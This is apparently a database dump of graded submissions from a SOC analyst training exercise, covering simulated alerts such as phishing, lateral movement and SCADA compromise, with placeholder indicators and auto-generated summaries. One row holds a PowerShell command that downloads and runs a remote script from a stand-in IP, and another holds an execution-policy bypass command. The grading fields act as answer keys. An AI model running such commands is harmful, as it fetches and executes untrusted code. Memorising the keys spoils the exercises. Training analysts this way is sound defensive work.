(255, 169, 271, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.101\",\"ip-10.0.0.5\",\"hash-5f4dcc3b\",\"artifact_3\",\"artifact_5\"],\"selectedActions\":[\"block_ip\",\"reset_credentials\",\"isolate_host\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 2/18/2026, 10:26:13 AM\\nALERT: Lateral Movement to OT Network [OP: Operation Iron Grid]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 192.168.1.101\\n- [IP] 10.0.0.5\\n- [HASH] 5f4dcc3b5aa765d61d8327deb882cf99\\n- [USERNAME] jdoe\\n- [IP] 203.0.113.55\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-02-18T07:26:18.573Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-18 07:24:25', '2026-02-28 21:00:00', 0, NULL),
(256, 169, 272, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.105\",\"ip-10.0.0.20\",\"hash-5d41402a\",\"artifact_2\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"reset_credentials\",\"block_ip\",\"isolate_host\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 2/18/2026, 10:27:46 AM\\nALERT: SCADA System Compromise [OP: Operation Iron Grid]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (6)\\n----------------\\n- [IP] 192.168.1.105\\n- [IP] 10.0.0.20\\n- [HASH] 5d41402abc4b2a76b9719d911017c592\\n- [IP] 203.0.113.45\\n- [FILENAME] malicious_script.sh\\n- [USERNAME] unauthorized_user\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-02-18T07:27:51.140Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-18 07:26:18', '2026-02-28 21:00:00', 0, NULL),
(257, 169, 274, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.45\",\"ip-10.0.0.15\",\"artifact_3\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"block_ip\",\"reset_credentials\",\"escalate\",\"collect_forensics\",\"block_hash\",\"isolate_host\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 2/18/2026, 10:28:57 AM\\nALERT: Phishing Attempt via Weaponized Job Offers [OP: Operation Silent Tsunami]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 203.0.113.45\\n- [IP] 10.0.0.15\\n- [EMAIL] recruiter@example.com\\n- [FILENAME] JobOffer.docm\\n- [HASH] d41d8cd98f00b204e9800998ecf8427e\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-02-18T07:29:01.521Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-18 07:28:06', '2026-02-28 21:00:00', 0, NULL),
(258, 169, 275, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.45\",\"ip-203.0.113.5\",\"hash-e99a18c4\",\"cmd-1\",\"artifact_1\",\"artifact_5\"],\"selectedActions\":[\"escalate\",\"reset_credentials\",\"block_ip\",\"isolate_host\",\"block_hash\",\"collect_forensics\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 2/18/2026, 10:29:41 AM\\nALERT: Malicious Code Execution on Developer Systems [OP: Operation Silent Tsunami]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (6)\\n----------------\\n- [IP] 192.168.1.45\\n- [IP] 203.0.113.5\\n- [HASH] e99a18c428cb38d5f260853678922e03\\n- [COMMAND] powershell.exe -ExecutionPolicy Bypass -File C:\\\\Users\\\\dev_user01\\\\malicious_script.ps1\\n- [USERNAME] dev_user01\\n- [FILENAME] malicious_script.ps1\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-02-18T07:29:46.297Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-18 07:29:01', '2026-02-28 21:00:00', 0, NULL),
(259, 169, 276, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.15\",\"ip-10.0.0.5\",\"ip-203.0.113.45\",\"hash-3f5d8f3e\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"block_ip\",\"reset_credentials\",\"isolate_host\",\"block_hash\",\"escalate\",\"collect_forensics\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 2/18/2026, 10:30:33 AM\\nALERT: Establishing Persistence and Lateral Movement [OP: Operation Silent Tsunami]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (6)\\n----------------\\n- [IP] 192.168.1.15\\n- [IP] 10.0.0.5\\n- [IP] 203.0.113.45\\n- [HASH] 3f5d8f3e5c4c4099d2a3f3a7b9b7b6f1\\n- [USERNAME] jdoe\\n- [FILENAME] persistence_tool.exe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-02-18T07:30:38.052Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-18 07:29:46', '2026-02-28 21:00:00', 0, NULL),
(260, 169, 277, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.45\",\"ip-10.0.0.5\",\"hash-e3b0c442\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"reset_credentials\",\"escalate\",\"block_ip\",\"isolate_host\",\"block_hash\",\"collect_forensics\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 2/18/2026, 10:31:00 AM\\nALERT: Cryptocurrency Exfiltration and Laundering [OP: Operation Silent Tsunami]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 203.0.113.45\\n- [IP] 10.0.0.5\\n- [HASH] e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\n- [EMAIL] attacker@malicious.com\\n- [FILENAME] exfil_transaction_details.csv\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-02-18T07:31:05.516Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-18 07:30:38', '2026-02-28 21:00:00', 0, NULL),
(261, 169, 278, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.15\",\"ip-203.0.113.45\",\"artifact_2\",\"artifact_3\",\"artifact_4\"],\"selectedActions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"block_hash\",\"isolate_host\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 2/18/2026, 10:33:38 AM\\nALERT: Compromised Update Detected [OP: Operation Glass Serpent]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 192.168.1.15\\n- [IP] 203.0.113.45\\n- [HASH] e5d8870e5bdd26602c622b7e5b0f6b4c\\n- [FILENAME] lib_mgmt.dll\\n- [USERNAME] admin_user\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-02-18T07:33:42.401Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-18 07:31:21', '2026-02-28 21:00:00', 0, NULL),
(262, 169, 279, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.15\",\"ip-203.0.113.45\",\"hash-b1946ac9\",\"artifact_3\",\"artifact_4\"],\"selectedActions\":[\"escalate\",\"reset_credentials\",\"block_ip\",\"isolate_host\",\"block_hash\",\"collect_forensics\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 2/18/2026, 10:34:05 AM\\nALERT: Execution of Malicious Code [OP: Operation Glass Serpent]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 192.168.1.15\\n- [IP] 203.0.113.45\\n- [HASH] b1946ac92492d2347c6235b4d2611184\\n- [FILENAME] malicious.dll\\n- [USERNAME] jdoe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-02-18T07:34:11.520Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-18 07:33:42', '2026-02-28 21:00:00', 0, NULL),
(263, 169, 280, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.45\",\"ip-192.168.1.10\",\"hash-abc123de\",\"artifact_5\"],\"selectedActions\":[\"reset_credentials\",\"block_ip\",\"escalate\",\"collect_forensics\",\"block_hash\",\"isolate_host\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 2/18/2026, 10:34:35 AM\\nALERT: Establish Persistence [OP: Operation Glass Serpent]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (4)\\n----------------\\n- [IP] 203.0.113.45\\n- [IP] 192.168.1.10\\n- [HASH] abc123def4567890abc123def4567890\\n- [USERNAME] admin_user\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-02-18T07:34:39.301Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-18 07:34:11', '2026-02-28 21:00:00', 0, NULL),
(264, 169, 281, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.105\",\"ip-10.0.0.55\",\"ip-203.0.113.45\",\"hash-e99a18c4\",\"artifact_4\",\"artifact_6\"],\"selectedActions\":[\"escalate\",\"collect_forensics\",\"block_hash\",\"reset_credentials\",\"block_ip\",\"isolate_host\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 2/18/2026, 10:35:58 AM\\nALERT: Lateral Movement and Data Exfiltration [OP: Operation Glass Serpent]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (6)\\n----------------\\n- [IP] 192.168.1.105\\n- [IP] 10.0.0.55\\n- [IP] 203.0.113.45\\n- [HASH] e99a18c428cb38d5f260853678922e03\\n- [FILENAME] confidential_data.xlsx\\n- [USERNAME] jdoe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-02-18T07:36:03.538Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-18 07:34:39', '2026-02-28 21:00:00', 0, NULL),
(265, 169, 285, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-185.92.220.34\",\"ip-10.0.2.15\",\"artifact_2\",\"artifact_3\",\"artifact_4\"],\"selectedActions\":[\"block_ip\",\"reset_credentials\",\"escalate\",\"collect_forensics\",\"block_hash\",\"isolate_host\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 2/18/2026, 10:40:09 AM\\nALERT: Spear-Phishing Email Campaign Detected [OP: Operation Phantom Ballot]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 185.92.220.34\\n- [IP] 10.0.2.15\\n- [EMAIL] john.doe@fakeorg.com\\n- [HASH] e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\n- [URL] http://malicious-link.com/login\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-02-18T07:40:14.400Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-18 07:36:11', '2026-02-28 21:00:00', 0, NULL),
(266, 169, 286, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-10.14.22.5\",\"ip-203.0.113.45\",\"hash-d41d8cd9\",\"domain-http://login\",\"domain-login-secure\"],\"selectedActions\":[\"block_ip\",\"reset_credentials\",\"escalate\",\"block_hash\",\"isolate_host\",\"collect_forensics\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 2/18/2026, 10:41:42 AM\\nALERT: Malicious Domain Infrastructure Identified [OP: Operation Phantom Ballot]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 10.14.22.5\\n- [IP] 203.0.113.45\\n- [HASH] d41d8cd98f00b204e9800998ecf8427e\\n- [DOMAIN] http://login-secure-portal.com/login\\n- [DOMAIN] login-secure-portal.com\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-02-18T07:41:47.317Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-18 07:40:14', '2026-02-28 21:00:00', 0, NULL),
(267, 169, 287, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.45\",\"ip-10.0.0.25\",\"hash-e99a18c4\",\"artifact_2\"],\"selectedActions\":[\"escalate\",\"reset_credentials\",\"collect_forensics\",\"isolate_host\",\"block_ip\",\"block_hash\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 2/18/2026, 10:42:33 AM\\nALERT: OAuth Token Abuse Technique Detected [OP: Operation Phantom Ballot]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (4)\\n----------------\\n- [IP] 203.0.113.45\\n- [IP] 10.0.0.25\\n- [HASH] e99a18c428cb38d5f260853678922e03\\n- [USERNAME] j.doe@company.com\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-02-18T07:42:36.455Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-18 07:41:47', '2026-02-28 21:00:00', 0, NULL),
(268, 169, 288, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-02-18 07:42:36', '2026-02-18 07:42:36', 0, NULL),
(269, 170, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-02-18 08:19:53', '2026-02-18 08:19:53', 0, NULL),
(270, 171, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-02-18 09:49:56', '2026-02-18 09:49:56', 0, NULL),
(271, 178, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-02-19 05:19:23', '2026-02-19 05:19:23', 0, NULL),
(272, 177, 268, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.100\",\"ip-10.0.0.15\",\"ip-203.0.113.45\",\"artifact_1\",\"artifact_3\"],\"selectedActions\":[\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 2/22/2026, 4:25:52 PM\\nALERT: Phishing Email Detected [OP: Operation Iron Grid]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 192.168.1.100\\n- [IP] 10.0.0.15\\n- [IP] 203.0.113.45\\n- [EMAIL] abc123@example.com\\n- [HASH] 3a7bd3e2360f1edb0f3b4e5c7b6e9d5a\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (4)\\n------------------------------\\n- Block IP/Domain\\n- Block File Hash\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-02-22T10:56:28.351Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-19 14:40:27', '2026-02-28 21:00:00', 0, NULL),
(273, 126, 637, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.10\",\"ip-203.0.113.77\",\"hash-d41d8cd9\",\"cmd-1\"],\"selectedActions\":[\"isolate_host\",\"block_hash\",\"block_ip\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 19-2-2026, 21:43:04\\nALERT: Suspicious Process Execution Detected\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (4)\\n----------------\\n- [IP] 192.168.1.10\\n- [IP] 203.0.113.77\\n- [HASH] d41d8cd98f00b204e9800998ecf8427e\\n- [COMMAND] powershell.exe -c IEX (New-Object Net.WebClient).DownloadString(\'http://203.0.113.77/malware.ps1\')\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (4)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-02-19T20:43:17.501Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). Missed critical artifacts: command powershell.exe -c IEX (New-Object Net.WebClient).DownloadString(\'http://203.0.113.77/malware.ps1\') (1/2). Response actions correct (+30)\",\"missed_items\":[\"command: powershell.exe -c IEX (New-Object Net.WebClient).DownloadString(\'http://203.0.113.77/malware.ps1\')\"],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-19 20:39:44', '2026-02-28 21:00:00', 0, NULL),
(274, 181, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-02-20 03:05:11', '2026-02-20 03:05:11', 0, NULL),
(275, 183, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-02-20 03:55:15', '2026-02-20 03:55:15', 0, NULL),
(276, 183, 767, 'investigating', NULL, NULL, NULL, NULL, '2026-02-20 07:46:11', '2026-02-20 04:38:11', '2026-02-20 04:38:11', 0, NULL),
(277, 184, 268, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.45\",\"artifact_1\",\"artifact_3\"],\"selectedActions\":[\"block_hash\",\"block_ip\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 2/20/2026, 3:13:01 AM\\nALERT: Phishing Email Detected [OP: Operation Iron Grid]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (3)\\n----------------\\n- [IP] 203.0.113.45\\n- [EMAIL] abc123@example.com\\n- [HASH] 3a7bd3e2360f1edb0f3b4e5c7b6e9d5a\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (2)\\n------------------------------\\n- Block IP/Domain\\n- Block File Hash\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-02-20T08:13:36.075Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (2/4)\",\"missed_items\":[\"collect_forensics\",\"escalate\"],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-20 08:05:25', '2026-02-28 21:00:00', 0, NULL),
(278, 184, 269, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.50\",\"hash-d41d8cd9\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\",\"block_ip\",\"reset_credentials\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 2/20/2026, 3:16:22 AM\\nALERT: BlackEnergy Malware Execution [OP: Operation Iron Grid]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (4)\\n----------------\\n- [IP] 203.0.113.50\\n- [HASH] d41d8cd98f00b204e9800998ecf8427e\\n- [FILENAME] invoice.doc\\n- [USERNAME] jdoe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-02-20T08:16:25.168Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-20 08:13:36', '2026-02-28 21:00:00', 0, NULL),
(279, 184, 270, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-02-20 08:16:25', '2026-02-20 08:16:25', 0, NULL),
(280, 185, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-02-20 08:58:30', '2026-02-20 08:58:30', 0, NULL),
(281, 185, 734, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.5\",\"ip-10.0.0.15\",\"domain-http://newve\",\"domain-newvendor.co\",\"artifact_1\"],\"selectedActions\":[],\"verdict\":\"false_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 2/20/2026, 5:02:21 PM\\nALERT: False Positive Alert: Legitimate Email Flagged as Phishing\\nVERDICT: FALSE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 203.0.113.5\\n- [IP] 10.0.0.15\\n- [DOMAIN] http://newvendor.com/welcome\\n- [DOMAIN] newvendor.com\\n- [EMAIL] info@newvendor.com\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (0)\\n------------------------------\\n(No active containment measures)\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-02-20T09:02:28.957Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). Artifact analysis completed (+30). Missed response actions (0/1)\",\"missed_items\":[\"close_alert\"],\"strengths\":\"Needs improvement\"}', NULL, '2026-02-20 08:59:08', '2026-02-28 21:00:00', 0, NULL),
